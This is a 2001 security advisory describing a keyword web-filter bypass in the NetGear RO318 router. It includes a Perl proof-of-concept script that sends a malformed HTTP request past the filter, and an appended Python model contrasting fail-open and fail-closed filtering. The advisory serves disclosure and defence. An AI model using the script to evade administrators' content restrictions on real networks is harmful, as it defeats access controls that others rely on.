=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory
=+ Null Byte Security
=+ http://home.tampabay.rr.com/nbs/
=+ don't call it a come back
=+ nbs@tampabay.rr.com
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table
=+
=+ 1. About
=+ 2. Affected
=+ 3. Details
=+ 4. Contact
=+ 5. Conclusion
=+ 6. Thanks
=+ 7. Greets
=+ 8. POC
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1. About
=+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch
=+ fully protects your small office network against intrusion. Equipped with
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and
=+ Network Address Translation (NAT) to maintain network security against
=+ hackers, it ensures prolonged up time and maximized productivity for your
=+ network. Web content filtering options let network administrators establish
=+ restricted access policies - based on the time of day, day of week, and Web
=+ address keyword - and receive regular reports and instant alerts via e-mail on
=+ hacker attempts and browsing activities. Web-based installation instructions
=+ make setup easy. Your network is up and running, and sharing high-speed
=+ Internet access with up to 253 users, in less than an hour.
=+
=+ The component this advisory concerns is the Web address keyword filter.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2. Affected
=+
=+ NetGear RO318 Cable/DSL Security Router
=+
=+ The RO318 is the only router we tested and the only one listed here, but
=+ other routers that share the RO318's web filtering code are likely to be
=+ affected as well.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3. Details
=+
=+ We are not certain of the details ourselves because of time constraints,
=+ but we do have an idea.
=+ The web filtering component in the firmware appears to check only fully
=+ formed HTTP requests. A request that does not match the form the filter
=+ expects is never compared against the keyword rules and is forwarded as
=+ it is, so a client behind the router can retrieve content the
=+ administrator has restricted. The POC in section 8 sends "GET / HTTP/1.0"
=+ with bare LF line endings and no Host header, and that is enough to
=+ retrieve the blocked page. Note that browsers send fully formed requests:
=+ the bypass as shown needs a client that deliberately sends the
=+ non-standard request, and this advisory makes no claim about ordinary
=+ browser traffic.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4. Contact
=+
=+ December  2 2001: Contacted NetGear
=+ December  2 2001: Contacted online support
=+ December  3 2001: NetGear sent back an e-mail ticket number (NGI50460001)
=+ December  3 2001: NetGear sent back an e-mail ticket number (NGI50460003)
=+ December  3 2001: NetGear sent back an e-mail ticket number (NGI50460006)
=+ December  3 2001: NetGear sent back an e-mail ticket number (NGI50460008)
=+ December  8 2001: Five working days passed
=+ December 20 2001: Eighteen days passed
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/
=+ December 26 2001: POC released
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5. Conclusion
=+
=+ This is definitely a security vulnerability and not a feature. We hope
=+ NetGear will fix this with their next firmware release so administrators
=+ can restrict the web content they need to without having to worry about
=+ this bug.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6. Thanks
=+
=+ Bi0cide for the help
=+ Datagram for the help
=+ Natas for the help
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7. Greets
=+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11,
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com),
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm,
=+ Security Focus, and everyone else.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8. POC
=+
=+ Run from a host behind the RO318 against a web server whose content the
=+ router's keyword filter blocks. The raw response is appended to a file
=+ named "html" in the current directory.

#!/usr/bin/perl
# NetGear RO318 Web Filter Bypass Exploit by Null Byte Security
# don't call it a come back
# nbs@tampabay.rr.com
use strict;
use warnings;
use IO::Socket;
use Getopt::Std;

my %argv;
getopts('h:p:z', \%argv);    # -z is accepted but unused

if (!defined $argv{h}) {
    print "NetGear RO318 Web Filter Bypass Exploit by Null Byte Security\n";
    print "Usage: $0 -h <host> [-p <port>]\n";
    exit;
}

begin();

sub begin {
    my $html = "html";                              # output file for the page
    my $host = $argv{h};
    my $port = defined $argv{p} ? $argv{p} : 80;    # default to port 80

    my $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => $port,
    ) or die "Connection Refused.\n";

    # Deliberately not a fully formed HTTP request: bare LF line endings and
    # no Host header. This is the request that the router's filter lets through.
    print $socket "GET / HTTP/1.0\n\n";

    # Append whatever the server returns to the log file.
    open(my $log, '>>', $html) or die "Cannot open $html: $!\n";
    while (<$socket>) {
        print $log $_;
    }
    close $log;
    close $socket;
}

=+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
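The behaviour section 3 describes, a keyword filter that applies its rules only to requests it can fully parse and forwards everything else unchecked, modelled next to a fail-closed variant. This is an added example written for this page, not the RO318 firmware or Null Byte Security's code; the blocklist words, the request grammar the lenient filter expects (a known method, an HTTP/1.x version, CRLF line endings, a Host header) and the sample requests are constructed assumptions. The POC-shaped request is the same bytes the section 8 script sends.

```python
"""Constructed model of a URL-keyword web filter, not the RO318 firmware.

lenient_filter() applies the keyword rules only to requests it can fully
parse and forwards anything else untouched (the behaviour section 3
describes). strict_filter() refuses anything it cannot parse.
"""
import re
from typing import Optional

# Keyword blocklist of the kind an administrator would configure. Assumed.
BLOCKED_KEYWORDS = ("games", "chat")

# What the lenient filter treats as a "fully constructed" request: a known
# method, a target, an HTTP/1.x version and CRLF line endings. This grammar
# is an assumption for the model, not the firmware's real parser.
REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]\r\n")


def parse_request(raw: bytes) -> Optional[dict]:
    """Strict parse. Returns {'path', 'host'} or None when the request is
    not well formed (bad request line, missing blank line, malformed header,
    or no Host header)."""
    m = REQUEST_LINE.match(raw)
    if not m:
        return None
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            return None
        headers[name.strip().lower()] = value.strip()
    if b"host" not in headers:
        return None
    return {"path": m.group(2), "host": headers[b"host"]}


def matches_blocklist(req: dict) -> bool:
    """Keyword match over host + path, case-insensitive."""
    url = (req["host"] + req["path"]).lower()
    return any(word.encode() in url for word in BLOCKED_KEYWORDS)


def lenient_filter(raw: bytes) -> str:
    """Fail-open: unparseable traffic is forwarded without a keyword check."""
    req = parse_request(raw)
    if req is None:
        return "allow"
    return "deny" if matches_blocklist(req) else "allow"


def strict_filter(raw: bytes) -> str:
    """Fail-closed: unparseable traffic is dropped; parsed traffic is checked."""
    req = parse_request(raw)
    if req is None:
        return "deny"
    return "deny" if matches_blocklist(req) else "allow"


def compare(raw: bytes) -> dict:
    """Decision of both filters for one raw request."""
    return {"lenient": lenient_filter(raw), "strict": strict_filter(raw)}


# Constructed sample requests.
WELL_FORMED = (b"GET /index.html HTTP/1.0\r\n"
               b"Host: www.games.example\r\n"
               b"\r\n")
# Exactly what the section 8 POC sends: bare LF line endings, no Host header.
POC_SHAPE = b"GET / HTTP/1.0\n\n"
# Same shape with a blocked keyword in the path; still never keyword-checked
# by the lenient filter because parsing fails first.
POC_KEYWORD = b"GET /games/ HTTP/1.0\n\n"

if __name__ == "__main__":
    for name, raw in (("well-formed", WELL_FORMED),
                      ("poc-shape", POC_SHAPE),
                      ("poc-shape+keyword", POC_KEYWORD)):
        print(f"{name:20s} {compare(raw)}")
```

The fail-closed variant is what a keyword filter on a gateway needs: a request the filter cannot interpret must not be forwarded. A filter that wants to tolerate sloppy clients should normalise first (accept a bare LF as a line terminator, for instance) and then apply the same rules to the normalised request, rather than skip the rules when parsing fails.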